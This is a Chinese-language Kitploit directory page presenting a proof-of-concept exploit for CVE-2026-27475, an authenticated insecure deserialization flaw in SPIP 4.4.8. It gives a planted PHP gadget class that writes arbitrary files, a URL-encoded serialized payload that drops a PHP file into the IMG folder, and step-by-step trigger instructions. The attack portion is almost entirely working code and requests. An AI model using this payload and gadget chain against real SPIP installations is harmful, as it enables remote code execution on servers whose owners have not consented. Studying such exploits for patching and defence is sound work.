Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-27475 — CVE-2026-27475 的概念验证漏洞利用程序,该漏洞是 SPIP 4.4.8 中一个已认证的不安全反序列化漏洞,可导致远程代码执行。 | Kitploit
工具/GitHubGitHub/trachinus/cve-2026-27475
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试Payload 开发
GitHubtrachinus/cve-2026-27475

CVE-2026-27475

CVE-2026-27475 的概念验证漏洞利用程序,该漏洞是 SPIP 4.4.8 中一个已认证的不安全反序列化漏洞,可导致远程代码执行。

查看仓库
14小时27分前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2026-27475(CVSS-B 9.2 严重)

SPIP 4.4.8 中经过身份验证的不安全反序列化漏洞

> 更多解释请访问我的网站 <

PoC

为了触发 RCE,你需要一个存在漏洞的插件。我制作了一个快速示例。

  1. 创建以下文件: plugins/rce_gadget/paquet.xml
root@kitploit:~
<paquet
    prefix="rce_gadget"
    categorie="outil"
    version="1.0.0"
    etat="test"
    compatibilite="[4.0.0;4.*.*]"
>
    <nom>RCE Gadget</nom>
    <auteur>Attacker</auteur>
</paquet>

plugins/rce_gadget/rce_gadget_options.php

root@kitploit:~
<?php
class ExploitGadget {
    public $file;
    public $data;
    public function __destruct() {
        echo "<pre>DEBUG:\n";
        echo "File: "; var_dump($this->file);
        echo "Data: "; var_dump($this->data);
        echo "</pre>";
        file_put_contents($this->file, $this->data);
        die("PROOF");
    }
}
  1. 以管理员身份登录

  2. 访问此 URL:/spip.php?page=prive/formulaires/selecteur/lister&objets[afficher]=a%3A1%3A%7Bi%3A0%3BO%3A13%3A%22ExploitGadget%22%3A2%3A%7Bs%3A4%3A%22file%22%3Bs%3A11%3A%22IMG%2Frce.php%22%3Bs%3A4%3A%22data%22%3BS%3A19%3A%22%5C3c%5C3f%5C70%5C68%5C70%5C20%5C70%5C68%5C70%5C69%5C6e%5C66%5C6f%5C28%5C29%5C3b%5C20%5C3f%5C3e%22%3B%7D%7D&var_mode=recalcul&objets[selectionner][]=a。

该载荷解码后为:a:1:{i:0;O:13:"ExploitGadget":2:{s:4:"file";s:11:"IMG/rce.php";s:4:"data";S:19:"<?php phpinfo(); ?>";}}。这种编码方式可防止编码错误,并确保 unserialize 完美运行。

  1. 随后应在 IMG 文件夹中创建 rce.php 文件。你可以访问 /IMG/rce.php 查看 phpinfo 的输出结果。
下载工具